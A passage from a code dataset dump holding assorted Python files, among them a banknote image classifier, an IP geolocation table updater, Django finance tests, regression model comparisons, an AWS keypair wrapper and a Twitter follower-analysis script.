output folder if exists\nfor files in os.listdir(dir_path):\n if files == 'output':\n shutil.rmtree(os.path.join(dir_path, files))\n #shutil.rmtree(os.path.join(os.getcwd()+'/' + dir_path, files))\n\n print('The output folder exist, and deleted.')\n\n\n# ### Combine images side by side\ndef merge_images():\n #create output folder\n os.mkdir(dir_path + '/output')\n \n #create classes folder\n for c in class_names:\n os.mkdir(dir_path +'/output/'+c)\n\n img_id = 0\n files = [f for f in glob.glob(dir_path + '/*.jpg')]\n files = [f for f in files if '_std' not in f]\n files.sort()\n #print (files)\n for fpath in files:\n #fname = fpath.split('/')[-1]\n ntpath.basename(fpath)\n head, tail = ntpath.split(fpath)\n fname = tail\n #print(fname)\n if (fname == 'StandardFront.jpg'):\n continue\n std_fpath = fpath[:-4]+'_std.jpg'\n #Read defect and standard images and combine them\n im1 = cv2.imread(fpath)\n im2 = cv2.imread(std_fpath)\n im3 = cv2.hconcat([im1, im2])\n\n img_id += 1\n new_fpath = dir_path + '/output/'+str(img_id)+'.jpg'\n\n cv2.imwrite(new_fpath, im3)\n\n\n# ### Predict the image class\n\ndef predict_image(model, img_path, use_cuda, class_names):\n # load the image and return the predicted breed\n\n mytransform = transforms.Compose([transforms.ToPILImage(), transforms.Resize((224,224)), transforms.ToTensor(), transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])])\n np_img = cv2.imread(img_path)\n #plt.imshow(np_img)\n\n tensor_img = mytransform(np_img)\n tensor_img = tensor_img.unsqueeze(0) # create tensor with batch dimension\n if use_cuda:\n tensor_img = tensor_img.cuda()\n \n model.eval()\n output = model(tensor_img)\n output = output.cpu().detach().numpy()\n pred_idx = np.argmax(output)\n return class_names[pred_idx]\n\n\n# ### Predict each file and move to respective folder\n# \n\ndef classify_image():\n file_lists = [f for f in glob.glob(dir_path +'/output/*.jpg')]\n for file_path in file_lists:\n #file_name = file_path.split('/')[-1]\n ntpath.basename(file_path)\n head, tail = ntpath.split(file_path)\n file_name = tail\n print('Classifying: '+file_name)\n cs = str(predict_image(model, file_path, use_cuda, class_names)) \n \n for c in class_names:\n \n if cs == c:\n shutil.move(file_path, dir_path +'/output/'+c+'/'+file_name)\n\n\n\nmerge_images()\nclassify_image()\n\n\n#Count file in folders and put in dictionary\nclass_output = {}\nfor c in class_names:\n dir_name = dir_path + '/output/'+c+'/'\n file_count = glob.glob(dir_name+'*.*')\n #print(c,len(file_count))\n class_output[c] = len(file_count)\n#print(class_output) \n\n#write dictionary file to CSV\ncsv_file = 'output.csv'\ncsv_columns = ['Type', 'Total Number']\n\nwith open(csv_file, 'w') as csvfile:\n writer = csv.DictWriter(csvfile, fieldnames=csv_columns)\n writer.writeheader()\n for key, value in class_output.items():\n writer.writerow({'Type': key, 'Total Number': value})\n\n\n\n#Read CSV and plot bar graph\ndf = pd.read_csv('output.csv', sep=',')\nprint(df)\n\ndf.set_index('Type').plot.bar(legend=None)\n\nfor i, val in enumerate(df['Total Number'].values):\n plt.text(i, val+0.1, df['Total Number'][i])\n\nplt.title('Unfit Back Banknotes Classification by Number')\nplt.xlabel('Classifications')\nplt.xticks(rotation=0)\nplt.ylabel('Number of Notes')\nplt.savefig(dir_path+'/output/output.png')\n\n\nprint('Classification done!, the images are sorted to the respective folder')\n\n\n# ### Generate the HTML ouput\n\n\ndoc, tag, text = Doc().tagtext()\n\n\nwith tag('div', id='photo_container'):\n doc.stag('img', src='output.png', klass='photo')\n doc.stag('br')\nwith tag('h2'):\n text('Classification Ouput')\nwith tag('a', href='./dot/'):\n text('Output folder for DOT')\n doc.stag('br')\nwith tag('a', href='./miss_print/'):\n text('Output folder for Miss print')\n doc.stag('br')\nwith tag('a', href='./over_ink/'):\n text('Output folder for Over ink')\n doc.stag('br')\nwith tag('a', href='./set_off/'):\n text('Output folder for Set off')\n doc.stag('br')\nwith tag('a', href='./under_ink/'):\n text('Output folder for Under ink')\n doc.stag('br')\nwith tag('a', href='./wiping/'):\n text('Output folder for Wiping')\n doc.stag('br')\n \n\nf = open(dir_path+'/output/output.html','w')\n\nmessage = '''\n\n'''+ doc.getvalue() + '''\n'''\n\nf.write(message)\nf.close()\n\n\nprint('The report is generated to output.html')\n\n","sub_path":"classify_notes_back.py","file_name":"classify_notes_back.py","file_ext":"py","file_size_in_byte":6070,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"28080763","text":"import csv\nimport sys\nfrom ipInfo import *\n\nMANAGEMENT = \"/home/ec2-user/GEMCloud_Visualization/management\"\n\ndef main():\n update_tables()\n update_latLon_loc()\n\n\n\"\"\"\n Get each ip_address of user information from ip_loc.csv dataset\n\"\"\"\ndef get_ip_list_database():\n ip_list = []\n with open(MANAGEMENT+'/datasheets/ipGeoDatabase/ip_loc.csv', 'rb') as csvfile:\n reader = csv.reader(csvfile)\n for row in reader:\n if row[0] not in ip_list:\n ip_list.append(row[0])\n return ip_list\n\n\"\"\"\n Get each latLon of user information from ip_latLon.csv dataset\n\"\"\"\ndef get_latLon_list_from_ip_loc():\n latLon_list = []\n with open(MANAGEMENT+'/datasheets/ipGeoDatabase/ip_latLon.csv', 'rb') as csvfile:\n reader = csv.reader(csvfile)\n for row in reader:\n latLon_list.append(row[1])\n return latLon_list\n\n\n\"\"\"\n Get each location of user information from ip_loc.csv dataset\n\"\"\"\ndef get_loc_list_database():\n loc_list = []\n with open(MANAGEMENT+'/datasheets/ipGeoDatabase/ip_loc.csv', 'rb') as csvfile:\n reader = csv.reader(csvfile)\n for row in reader:\n loc_list.append(row[1])\n return loc_list\n\n\n\"\"\"\n Get each latLon of user information from user_info.csv dataset\n\"\"\"\ndef get_latLon_list_database():\n latLon_list = []\n with open(MANAGEMENT+'/datasheets/ipGeoDatabase/latLon_loc.csv', 'rb') as csvfile:\n reader = csv.reader(csvfile)\n for row in reader:\n# print row[0]\n if row[0] not in latLon_list:\n latLon_list.append(row[0])\n return latLon_list\n\n\n\n\"\"\"\n Get each ip_address of user information from user_info.csv dataset\n\"\"\"\ndef get_ip_list_dataInfo():\n ip_list = []\n with open(MANAGEMENT+'/datasheets/user_info.csv', 'rb') as csvfile:\n reader = csv.reader(csvfile)\n for row in reader:\n if row[6] not in ip_list:\n ip_list.append(row[6])\n\n with open(MANAGEMENT+'/datasheets/finished_jobs.csv', 'rb') as csvfile:\n reader = csv.reader(csvfile)\n for row in reader:\n j_ip = row[20]\n if j_ip != 'NULL':\n if j_ip not in ip_list:\n ip_list.append(j_ip)\n\n return ip_list\n\n\n\"\"\"\n Get each latLon of user information from ip_latLon.csv dataset\n\"\"\"\ndef get_latLon_list_dataInfo():\n latLon_list = []\n with open(MANAGEMENT+'/datasheets/ipGeoDatabase/ip_latLon.csv', 'rb') as csvfile:\n reader = csv.reader(csvfile)\n for row in reader:\n if row[1] not in latLon_list:\n latLon_list.append(row[1])\n return latLon_list\n\n\ndef update_tables():\n ip_list_dataInfo = get_ip_list_dataInfo()\n ip_list_database = get_ip_list_database()\n ip_loc_table = csv.writer(open(MANAGEMENT+\"/datasheets/ipGeoDatabase/ip_loc.csv\", \"ab\"))\n latLon_loc_table = csv.writer(open(MANAGEMENT+\"/datasheets/ipGeoDatabase/latLon_loc.csv\", \"ab\"))\n ip_latLon_table = csv.writer(open(MANAGEMENT+\"/datasheets/ipGeoDatabase/ip_latLon.csv\", \"ab\"))\n latLon_list = []\n for ip_dataInfo in ip_list_dataInfo:\n if ip_dataInfo not in ip_list_database:\n ip_latLon_entry = [ip_dataInfo]\n ip_info = ipInfo(ip_dataInfo)\n ip_loc_entry = [ip_dataInfo]\n latLon_loc_entry = [ip_info.latLon]\n ip_loc_entry.append(ip_info.loc_entry)\n ip_latLon_entry.append(ip_info.latLon)\n latLon_loc_entry.append(ip_info.loc_entry)\n ip_loc_table.writerow(ip_loc_entry)\n ip_latLon_table.writerow(ip_latLon_entry)\n if latLon_loc_entry not in latLon_list:\n latLon_list.append(latLon_loc_entry)\n latLon_loc_table.writerow(latLon_loc_entry)\n\ndef update_latLon_loc():\n ip_list_database = get_ip_list_database()\n latLon_list_from_ip_loc = get_latLon_list_from_ip_loc()\n loc_list_database = get_loc_list_database()\n latLon_list_database = get_latLon_list_database()\n latLon_loc_table = csv.writer(open(MANAGEMENT+\"/datasheets/ipGeoDatabase/latLon_loc.csv\", \"ab\"))\n add_latLon_list = []\n for ip_database in ip_list_database:\n if ip_database != 'ip_address':\n ip_index = ip_list_database.index(ip_database) \n latLon = latLon_list_from_ip_loc[ip_index]\n loc_entry = loc_list_database[ip_index]\n\n if latLon not in latLon_list_database:\n if latLon != \"lat, lon\":\n if latLon not in add_latLon_list:\n add_latLon_list.append(latLon)\n latLon_loc_entry = [latLon]\n latLon_loc_entry.append(loc_entry)\n latLon_loc_table.writerow(latLon_loc_entry)\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"management/ip_latLon_loc/update_ipGeoDatabase.py","file_name":"update_ipGeoDatabase.py","file_ext":"py","file_size_in_byte":4367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"356019884","text":"# -*- coding: utf-8 -*-\nimport datetime\nfrom loach.model.base.basemodel import BaseModel\nfrom loach.model import douyindb\nfrom sqlalchemy import Column, Integer, String, DateTime\n\n\nclass DouYinLikeRelation(BaseModel):\n __tablename__ = 'tar_douyin_like_relation'\n __db__ = douyindb\n __key__ = 'user_id'\n __table_args__ = {\n \"schema\": \"douyindb_test\"\n }\n\n # 元数据\n id = Column(Integer, primary_key=True, autoincrement=True, comment=u'记录 id')\n create_time = Column(DateTime, nullable=False,\n default=datetime.datetime.now, comment=u'记录创建时间')\n # 基本数据,可通过 PC 端获取\n user_id = Column(String, nullable=False, default='', comment=u'作者 id')\n video_id = Column(String, nullable=False, default='', comment=u'')\n\n @classmethod\n def add(cls, user_id=None, **kwargs):\n obj = cls(user_id=user_id, **kwargs)\n with cls.__db__.session_context(autocommit=True) as session:\n session.add(obj)\n\n @classmethod\n def add_all(cls, objs):\n relations = [cls(**obj) for obj in objs]\n with cls.__db__.session_context(autocommit=True) as session:\n session.add_all(relations)\n\n @classmethod\n def exists(cls, user_id=None, video_id=None):\n with cls.__db__.session_context() as session:\n record = session.query(cls).filter(cls.user_id == user_id, cls.video_id == video_id).first()\n if record:\n return True\n else:\n return False\n\n @classmethod\n def upsert(cls, **kwargs):\n with cls.__db__.session_context(autocommit=True) as session:\n records = session.query(cls).with_for_update().filter(cls.user_id == kwargs['user_id'], cls.video_id == kwargs['video_id'])\n if records.first():\n rows_count = records.update({k: v for k, v in kwargs.items()})\n return rows_count\n else:\n session.add(cls(**kwargs))\n","sub_path":"loach/model/douyinlikerelation.py","file_name":"douyinlikerelation.py","file_ext":"py","file_size_in_byte":2000,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"9949151","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon May 15 22:50:16 2017\n\n@author: changchao\n\"\"\"\n\nimport matplotlib.pyplot as plt\n\nlabels = 'A', 'B', 'C', 'D'\n\nsizes = [20, 30, 40, 10]\n\nexplode = (0, 0, 0.1, 0)\n\nplt.pie(sizes, explode = explode, labels = labels, autopct = '%1.1f%%',\n shadow = True, startangle = 0)\n\nplt.show()\n","sub_path":"plt1.py","file_name":"plt1.py","file_ext":"py","file_size_in_byte":349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"283564998","text":"# Name - Dev Patel\r\n# Roll No - 18110113\r\n\r\nfrom operator import eq\r\nimport numpy as np\r\nfrom sympy import *\r\n\r\n\r\nlinks = int(input(\"Enter no of links: \")) # User input to get no of links\r\n\r\n\r\nQ_ddot = [sympify(\"q{}_ddot\".format(j)) for j in range(links)] # Define q\" - (from q\"(0) to q\"(n-1))\r\nQ_dot = [sympify(\"q{}_dot\".format(j)) for j in range(links)] # Define q' - (from q'(0) to q'(n-1))\r\nQ = [sympify(\"q{}\".format(j)) for j in range(links)] # Define q - joint angles (from q(0) to q(n-1))\r\n\r\nV = sympify(input(\"enter V: \")) # Get expression of potential in terms of joint angles form user\r\n\r\n# Get the D(q) matrix from the user in terms of q\r\nD = eye(links)\r\nfor i in range(links):\r\n for j in range(links):\r\n D[i,j] = sympify(input(\"enter element d({},{}): \".format(i,j)))\r\n\r\n\r\n# Forming the equations of motion \r\n\r\nfor k in range(links):\r\n a=0\r\n b=0\r\n for j in range(links):\r\n a += D[k,j]*Q_ddot[j]\r\n for i in range(links):\r\n for j in range(links):\r\n b += (diff(D[k,j],Q[i]) - 0.5*diff(D[i,j],Q[k])) * Q_dot[i]*Q_dot[j]\r\n c = diff(V,Q[k])\r\n T = sympify(\"T({})\".format(k)) # define the torques applied on the links\r\n\r\n lhs = sympify(a+b-c)\r\n rhs = T\r\n\r\n print(\"{} = {}\".format(lhs,rhs)) # print the equations","sub_path":"T11.py","file_name":"T11.py","file_ext":"py","file_size_in_byte":1289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"331519614","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nDescription: Test cases for finance models.\n\"\"\"\n__author__ = \"Ariel Gerardo Rios (ariel.gerardo.rios@gmail.com)\"\n\n\nfrom datetime import datetime\nfrom decimal import Decimal\n\nfrom django.test import TestCase\n\nfrom .models import Purchase, PurchaseItem, PurchaseCost, Sell, SellItem, SellCost\nfrom book.models import Book\n\n\nclass PurchaseTestCase(TestCase):\n def setUp(self):\n self._purchase = Purchase.objects.create(\n date=datetime.now().date(),\n price=Decimal('100.00'),\n )\n\n book = Book.objects.create(\n title='test title',\n )\n\n for i in range(10):\n PurchaseItem.objects.create(\n purchase=self._purchase,\n book=book,\n quantity=1,\n price=Decimal('1.00')\n )\n\n PurchaseCost.objects.create(\n purchase=self._purchase,\n date=datetime.now(),\n price=Decimal('1.00'),\n )\n\n def test_get_total_units(self):\n self.assertEquals(10, self._purchase.get_total_units())\n\n def test_get_total_cost(self):\n self.assertEquals(Decimal('10.00'), self._purchase.get_total_cost())\n\n def test_get_full_price(self):\n self.assertEquals(Decimal('110.00'), self._purchase.get_full_price())\n\n def test_get_total_price_with_price(self):\n self.assertEquals(Decimal('100.00'), self._purchase.get_total_price())\n\n def test_get_total_price_without_price(self):\n self._purchase.price = Decimal('0')\n self._purchase.save()\n self.assertEquals(Decimal('10.00'), self._purchase.get_total_price())\n\n\nclass SellTestCase(TestCase):\n def setUp(self):\n self._sell = Sell.objects.create(\n date=datetime.now().date(),\n price=Decimal('100.00'),\n )\n\n book = Book.objects.create(\n title='test title',\n )\n\n for i in range(10):\n SellItem.objects.create(\n sell=self._sell,\n book=book,\n quantity=1,\n price=Decimal('1.00')\n )\n\n SellCost.objects.create(\n sell=self._sell,\n date=datetime.now(),\n price=Decimal('1.00'),\n )\n\n def test_get_total_units(self):\n self.assertEquals(10, self._sell.get_total_units())\n\n def test_get_total_cost(self):\n self.assertEquals(Decimal('10.00'), self._sell.get_total_cost())\n\n def test_get_net_price(self):\n self.assertEquals(Decimal('90.00'), self._sell.get_net_price())\n\n def test_get_total_price_with_price(self):\n self.assertEquals(Decimal('100.00'), self._sell.get_total_price())\n\n def test_get_total_price_without_price(self):\n self._sell.price = Decimal('0')\n self._sell.save()\n self.assertEquals(Decimal('10.00'), self._sell.get_total_price())\n","sub_path":"l4capitulos/finance/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":2948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"239416639","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Nov 14 19:33:01 2018\n\n@author: Winry\n\"\"\"\n\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Nov 13 18:36:20 2018\n\n@author: Winry\n\"\"\"\n\nimport numpy as np\nfrom sklearn import preprocessing\nfrom sklearn.linear_model import BayesianRidge, LinearRegression, ElasticNet\nfrom sklearn.svm import SVR\nfrom sklearn.ensemble.gradient_boosting import GradientBoostingRegressor # 集成算法\nfrom sklearn.model_selection import cross_val_score # 交叉检验\nfrom sklearn.metrics import explained_variance_score, mean_absolute_error, mean_squared_error, r2_score # 批量导入指标算法\nimport pandas as pd \nimport matplotlib.pyplot as plt\n\n\n#df_train = pd.read_csv('train.csv')\n#df_test = pd.read_csv('test.csv')\n#\n#df_train = df_train.dropna(axis=0)\n#df_test = df_test.dropna(axis=0)\n#\n#X_train = df_train.iloc[:,0:6]\n#y_train = df_train.iloc[:,-2]\n#X_train['ytrain'] =y_train\n#X_train = X_train.dropna(axis=0)\n#y_train = X_train['ytrain']\n#X_train = X_train.iloc[:,0:10]\n#\n#X_test = df_test.iloc[0:150,1:11]\n#y_test = df_test.iloc[0:150,-1]\n#\n#X_test = X_test.dropna(axis=0)\n#y_test = y_test.dropna(axis=0)\n\n#X_train = preprocessing.scale(X_train)\n##y_train = preprocessing.scale(y_train)\n#X_test = preprocessing.scale(X_test)\n#y_test = preprocessing.scale(y_test)\n\n# 数据准备\ndf = pd.read_csv('d11_13.csv')\ndf = df.iloc[:,0:10]\ndf = df.dropna(axis=0)\n\nX = df.iloc[:,0:7]\ny = df['forecast']\n\nlabel_train = []\nlabel_test = []\n#X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=15)\nfor i in range(len(X)):\n temp = np.matlib.rand(1)\n if temp >= 0.8:\n label_test.append(i)\n else:\n label_train.append(i)\nX_train = X.iloc[label_train,:]\ny_train = y.iloc[label_train]\n\n\ndf_train = pd.read_csv('train.csv')\nX_train =df_train.dropna(axis=0).iloc[:,0:7]\ny_train = df_train.dropna(axis=0).iloc[:,-2]\n\n\ndf_test = pd.read_csv('test.csv')\n\n\ndf_test = df_test.dropna(axis=0)\nX_test = df_test.iloc[:,0:7]\ny_test = df_test.iloc[:,-2]\n\n\n\n\n\n# 训练回归模型\nn_folds = 6 # 设置交叉检验的次数\nmodel_br = BayesianRidge() \nmodel_lr = LinearRegression() \nmodel_etc = ElasticNet() \nmodel_svr = SVR() \nmodel_gbr = GradientBoostingRegressor() \nmodel_names = ['BayesianRidge', 'LinearRegression', 'ElasticNet', 'SVR', 'GBR'] \nmodel_dic = [model_br, model_lr, model_etc, model_svr, model_gbr] \ncv_score_list = [] # 交叉检验结果列表\npre_y_list = [] # 各个回归模型预测的y值列表\nfor model in model_dic: # 读出每个回归模型对象\n scores = cross_val_score(model, X_train, y_train, cv=n_folds) # 将每个回归模型导入交叉检验模型中做训练检验\n cv_score_list.append(scores) # 将交叉检验结果存入结果列表\n pre_y_list.append(model.fit(X_train, y_train).predict(X_train)) # 将回归训练中得到的预测y存入列表\n# 模型效果指标评估\nn_samples, n_features = X_train.shape # 总样本量,总特征数\nmodel_metrics_name = [explained_variance_score, mean_absolute_error, mean_squared_error, r2_score] # 回归评估指标对象集\nmodel_metrics_list = [] # 回归评估指标列表\nfor i in range(5): # 循环每个模型索引\n tmp_list = [] # 每个内循环的临时结果列表\n for m in model_metrics_name: # 循环每个指标对象\n tmp_score = m(y_train, pre_y_list[i]) # 计算每个回归指标结果\n tmp_list.append(tmp_score) # 将结果存入每个内循环的临时结果列表\n model_metrics_list.append(tmp_list) # 将结果存入回归评估指标列表\ndf1 = pd.DataFrame(cv_score_list, index=model_names) # 建立交叉检验的数据框\ndf2 = pd.DataFrame(model_metrics_list, index=model_names, columns=['ev', 'mae', 'mse', 'r2']) # 建立回归指标的数据框\nprint ('samples: %d \\t features: %d' % (n_samples, n_features)) # 打印输出样本量和特征数量\nprint (70 * '-')\nprint ('cross validation result:') # 打印输出标题\nprint (df1) # 打印输出交叉检验的数据框\nprint (70 * '-') \nprint ('regression metrics:') # 打印输出标题\nprint (df2) # 打印输出回归指标的数据框\nprint (70 * '-')\nprint ('short name \\t full name') # 打印输出缩写和全名标题\nprint ('ev \\t explained_variance')\nprint ('mae \\t mean_absolute_error')\nprint ('mse \\t mean_squared_error')\nprint ('r2 \\t r2')\nprint (70 * '-') # 打印分隔线\n# 模型效果可视化\nplt.figure() # 创建画布\nplt.plot(np.arange(X_train.shape[0]), y_train, color='k', label='true y') # 画出原始值的曲线\ncolor_list = ['r', 'b', 'g', 'y', 'c']\nlinestyle_list = ['-', '.', 'o', 'v', '*']\nfor i, pre_y in enumerate(pre_y_list): # 读出通过回归模型预测得到的索引及结果\n plt.plot(np.arange(X_train.shape[0]), pre_y_list[i], color_list[i], label=model_names[i]) # 画出每条预测结果线\nplt.title('regression result comparison')\nplt.legend(loc='upper right')\nplt.ylabel('real and predicted value') # y轴标题\nplt.show() # 展示图像\nprint ('regression prediction')\ncc = []\n\nfor i in range(len(X_test)):\n new_point = X_test.iloc[i,:]\n new_point = new_point.values\n new_point = np.array(new_point).reshape(1,-1)\n new_pre_y = model_gbr.predict(new_point)\n cc.append(list(np.around(new_pre_y)))\ngbr_count = 0\nfor i in range(len(y_test)):\n if (cc[i][0] <= y_test.iloc[i]+2)&(cc[i][0] >= y_test.iloc[i]-2):\n# if (cc[i][0] == y_test.iloc[i]):\n gbr_count += 1\nk11=[]\nfor i in range(len(cc)):\n k11.append(cc[i][0])\n\n \n\n","sub_path":"浦东滑行预测代码/demo2.py","file_name":"demo2.py","file_ext":"py","file_size_in_byte":5489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"399087759","text":"import turtle as t\nimport random as rnd\nimport math\n\nDEGS_IN_CIRC = 360\nINCR_DEGS = 12\nBOTTOM_EDGE = 200\nOUTER_EDGE = 50\nBOTTOM_TIP_ANGLE = 60\nTOP_TIP_ANGLE = 130\nTOP_EDGE = 230\nBG_COLOR = (0.8, 0.95, 0.9)\n\nscreen = t.getscreen()\nscreen.bgcolor(BG_COLOR)\nwidth = screen.window_width()\nheight = screen.window_height()\nt.shape(\"turtle\")\nt.delay(0)\nt.speed(\"fastest\")\n# t.exitonclick()\n\nwhile True:\n w = rnd.randint(0, width-1)\n h = rnd.randint(0, height-1)\n t.pu()\n t.goto(w - width/2, h - height/2)\n t.pd()\n\n stroke_color = 'green'\n for angle in range(0, DEGS_IN_CIRC, INCR_DEGS):\n t.setheading(angle)\n fill_color = (math.cos(math.radians(angle)) + 1)/2\n t.fillcolor(fill_color, fill_color, fill_color)\n t.begin_fill()\n t.pencolor(stroke_color)\n t.forward(BOTTOM_EDGE)\n t.left(BOTTOM_TIP_ANGLE)\n t.forward(OUTER_EDGE)\n t.left(TOP_TIP_ANGLE)\n t.forward(TOP_EDGE)\n t.end_fill()\n","sub_path":"week06/01_radial_design_nofuncts.py","file_name":"01_radial_design_nofuncts.py","file_ext":"py","file_size_in_byte":973,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"197789672","text":"'''\nAuthor: Puffrora\nDate: 2020-10-14 22:13:36\nLastModifiedBy: Puffrora\nLastEditTime: 2020-10-14 22:30:49\n'''\n\n\n\"\"\"\nHierholzer 算法可以在一个欧拉图中找出欧拉回路\n\n我们从节点 u 开始,任意地经过还未经过的边,直到我们「无路可走」。此时我们一定回到了节点 u,这是因为所有节点的入度和出度都相等\n回到节点 u 之后,我们得到了一条从 u 开始到 u 结束的回路,这条回路上仍然有些节点有未经过的出边\n我们再从某个这样的节点 v 开始,继续得到一条从 v 开始到 v 结束的回路,再嵌入之前的回路中,即\nu→⋯→v→⋯→u\n变为\nu→⋯→v→⋯→v→⋯→u\n以此类推,直到没有节点有未经过的出边,此时我们就找到了一条欧拉回路\n\"\"\"\nclass Solution:\n def crackSafe(self, n, k):\n seen = set()\n res = []\n threshold = 10 ** (n - 1)\n\n # node 都应该为 (n-1)位数 假设对于 n=3 k=5 某个node为 24\n def dfs(node):\n for x in range(k):\n # 若 x=3 下一个 node 为 243\n next_node = 10 * node + x\n if next_node not in seen:\n seen.add(next_node)\n # 取余得 43 则以 43 为节点继续搜索\n dfs(next_node % threshold)\n res.append(str(x))\n\n dfs(0)\n \n # 回到起点 起点为 0 因此要加上 \"0\" * (n - 1)\n return \"\".join(res) + \"0\" * (n - 1)\n\n","sub_path":"Leetcode/leetcode753 破解保险箱.py","file_name":"leetcode753 破解保险箱.py","file_ext":"py","file_size_in_byte":1513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"551291770","text":"'''\nCreated on 19-Mar-2014\n\n@author: annamalai\n'''\nfrom connection import AWS\n\nclass StructKeypairs():\n def __init__(self, id, region, fingerprint):\n self.region = region\n self.id = id\n self.fingerprint = fingerprint\n\nclass KeyPairs(AWS):\n \n def get_key_pairs(self):\n keypair_list = []\n if self.client:\n keypairs= self.client.get_all_key_pairs()\n for keypair in keypairs:\n keypair_list.append(StructKeypairs(keypair.name,keypair.region.name,keypair.fingerprint))\n else:\n raise Exception(\"Unable to connect \" + self.awscloud)\n return keypair_list\n \n def create_keypairs(self, name):\n if self.client:\n key_pair = self.client.create_key_pair(name)\n else:\n raise Exception(\"Unable to connect \" + self.awscloud)\n return key_pair\n \n def keypair_download(self,name):\n keypair = []\n if self.client:\n keypair = self.client.get_all_key_pairs(keynames = str(name))\n else:\n raise Exception(\"Unable to connect \" + self.awscloud)\n return keypair\n\n def delete_keypair(self,name):\n if self.client:\n key_pair = self.client.delete_key_pair(key_name = name)\n else:\n raise Exception(\"Unable to connect \" + self.awscloud)\n return key_pair\n","sub_path":"aws_api/keypairs.py","file_name":"keypairs.py","file_ext":"py","file_size_in_byte":1375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"633914197","text":"__author__ = 'dowling'\n\nfrom backend.core.util.util import *\nln = getModuleLogger(__name__)\n\nfrom collections import defaultdict\n\nimport ast\n\nclass NamedEntityIndex(object):\n def __init__(self):\n \"\"\"\n creates an inverted index:\n {named_entity -> [(document_id, frequency)]}\n \"\"\"\n self.index = defaultdict(list)\n try:\n self.load()\n except:\n ln.debug(\"Couldn't load index from file.\")\n\n def addDocument(self, document):\n counts = self.countEntities(document.vectors[\"named_entities\"])\n for namedEntity, count in counts.items():\n self.index[namedEntity].append((document._id, count))\n\n def countEntities(self, entities):\n entityCounts = defaultdict(int)\n for idx, (entityType, entity) in enumerate(entities):\n # first, update the raw count of this entity\n entityCounts[entity] += 1\n\n # next, see if this entity might be equivalent to any of the previous entities\n for otherEntityType, otherEntity in entities[:idx]:\n parts = otherEntity.split(\" \")\n # if the entity is a true subset of another entity, increment the frequency for the other one as well\n # This lets us better resolve situations where a person is mentioned (Firstname, Lastname),\n # but subsequently only mentioned by last name.\n # This also helps with organizations (Apple vs. Apple Computers).\n if len(parts) != 1 and entity in parts:\n entityCounts[otherEntity] += 1\n\n return entityCounts\n\n def query(self, namedEntity):\n return self.index[namedEntity]\n\n def save(self):\n with open(\"./persist/NERIndex.idx\", \"w\") as f:\n f.write(str(dict(self.index)))\n\n def load(self):\n with open(\"./persist/NERIndex.idx\", \"r\") as f:\n index = ast.literal_eval(f.read())\n self.index = defaultdict(list)\n for entry in index:\n self.index[entry] = index[entry]\n\n\n\n","sub_path":"backend/link/NamedEntityIndex.py","file_name":"NamedEntityIndex.py","file_ext":"py","file_size_in_byte":2078,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"357106188","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Sep 4 15:17:35 2020\n\n@author: miame\n\"\"\"\n\"\"\"\nAssignment:\n\nFor the purposes of this exercise, we define three types of Twitter users.\n- Layman: Users with less than 100 followers\n- Expert: Users with 100-1000 followers\n- Celebrity: Users with more than 1000 followers\n\nUsing the Twitter API, and starting with the @WUSTLPoliSci twitter user, answer\nthe following:\n-One degree of separation:\n –Among the followers of @WUSTLPoliSci who is the most active?\n –Among the followers of @WUSTLPoliSci who is the most popular, i.e. has\n the greatest number of followers?\n –Among the friends of @WUSTLPoliSci, i.e. the users she is following, who\n are the most active layman, expert and celebrity?\n –Among the friends of @WUSTLPoliSci who is the most popular?\n\n-Two degrees of separation: For the following two questions, limit your search\nof followers and friends to laymen and experts.\n –Among the followers of @WUSTLPoliSci and their followers, who is the\n most active?\n –Among the friends of @WUSTLPoliSci and their friends, who is the most active?\n\nFor reference, current tweepy documentation:\n http://docs.tweepy.org/en/v3.9.0/api.html\nLatest tweepy documentation:\n http://docs.tweepy.org/en/latest/api.html\n\"\"\"\nimport importlib # to import file\nimport sys # add directory to system PATH\nimport time\nimport tweepy\n\nstart_twitter_handle = 'WUSTLPoliSci'\n#start_twitter_handle = 'liang111590'\nbatch_size = 100 #max allowed by tweepy\nsleep_time = 5\nlaymen_follower_count = 100\nexpert_follower_count = 1000\ncelebrity_follower_count = 1001\n\nsys.path.insert(0, 'C:/Users/miame/Documents/Secrets')\ntwitter = importlib.import_module('start_twitter')\napi = twitter.client\n\nstart = time.time()\n\n# =============================================================================\n# variables we want from first degree of separation\n# =============================================================================\n\nmost_active_follower_WUSTL = {}\nmost_popular_follower_WUSTL = {}\n\nmost_active_friend_WUSTL_laymen = {}\nmost_active_friend_WUSTL_expert = {}\nmost_active_friend_WUSTL_celebrity = {}\nmost_popular_friend_WUSTL = {}\n\n# =============================================================================\n# additional variables from the second degree of separation\n# =============================================================================\n\nmost_active_follower = {}\nmost_active_friend = {}\n\n# =============================================================================\n# function to batch out users from provided list\n# from: https://stackoverflow.com/questions/8290397/how-to-split-an-iterable-in-constant-size-chunks\n# =============================================================================\n\ndef batch(iterable, n=batch_size):\n l = len(iterable)\n for ndx in range(0, l, n):\n yield iterable[ndx:min(ndx + n, 